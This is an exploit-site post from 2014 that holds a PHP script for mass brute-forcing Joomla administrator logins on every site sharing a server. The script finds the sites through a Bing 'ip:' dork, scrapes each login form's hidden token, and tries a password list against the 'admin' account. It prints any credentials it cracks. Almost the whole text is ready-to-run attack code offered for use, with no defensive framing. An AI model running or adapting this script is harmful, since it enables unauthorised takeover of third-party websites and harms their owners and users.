facebook facebook twitter rss

JOomla Brut force All websites on the server

Author: hamza killer , Published: 28-03-2014
<?

/*
@hamza killer
to: HawQal Dz - black-id - Top Gastro<3 - Ji Nx - linuxdz
exploit4arab.net
sec4all.org/cc/
sec4ever.com
*/
ini_set('memory_limit', '640M');
set_time_limit(0);
echo"
[+]==================================[+]
[+] JOmla Brut force All server [+]
[+] hamza killer [+]
[+] Made in Dz [+]
[+]==================================[+]
";
echo"
[I.Pservers][===>]";
$ip=trim(fgets(STDIN,1024));
echo"
[+] passw0rd list =>";
$file=trim(fgets(STDIN,1024));
$ex=@explode("\n",@file_get_contents($file));
if(!$ex){
echo"
[-] file not Found";
exit();
}
$c=count($ex);
echo"
[+] loaded $c pass";

/*
this function by g-b
*/
$dork = urlencode("ip:$ip index.php?option=com_");
$pages = pages($dork);
$scanaed = array();
for($i=1;$i<=$pages;$i=$i+10){
$src = file_get_contents("http://www.bing.com/search?q=$dork&first=$i");
preg_match_all('/<cite>(.*?)<strong>/',$src,$matches);
$sites = $matches[1];
foreach($sites as $site){

foreach($ex as $pass){

/*
This code by g-b ==>
*/
$sitet = trim(str_replace('www.','',str_replace('/','',$site)));
if(eregi('<',$sitet) || eregi('\?',$sitet)) continue;
if(in_array($sitet,$scanaed)) continue;
$scanaed[] = $sitet;
/*
code by g-b fincih <===
tnx to g-b ^_^
*/
$d=token($site);
$f=login($site,$pass,$d);
if($f){
echo"
\n
[+] Craced \n
[+] http://$site/administrator/index.php : admin : $pass\n";
}
}} }

function token($url)
{ $vurl='http://'.$url."/administrator/index.php";
$sh = curl_init();
curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($sh,CURLOPT_URL, $vurl);
$exe = curl_exec($sh);
preg_match('/<input type="hidden" name="(.*?)" value="1"/', $exe,$token);
return $token[1];
}
function login($url,$password,$token)
{ $urlv='http://'.$url.'/administrator/index.php';
$sh = curl_init();
curl_setopt($sh,CURLOPT_RETURNTRANSFER,1);
curl_setopt($sh,CURLOPT_FOLLOWLOCATION,1);
curl_setopt($sh,CURLOPT_URL, $urlv);
curl_setopt($sh,CURLOPT_POSTFIELDS,"username=admin&passwd=$password&lang=&option=com_login&task=login&return=aW5kZXgucGhw&{$token}=1");
$brute = curl_exec($sh);
if(eregi("Logout" , $brute))
{
return true;
}else{
return false;

}
}
function pages($dork){
$sourc = file_get_contents("http://www.bing.com/search?q=$dork&go=&qs=n&sk=&filt=all&first=199&FORM=PERE3");
$exop= explode('<span class="sb_count" id="count">',$sourc);
$exop = explode('-',$exop['1']);
return $exop[0];
}
?>

Like us on Facebook :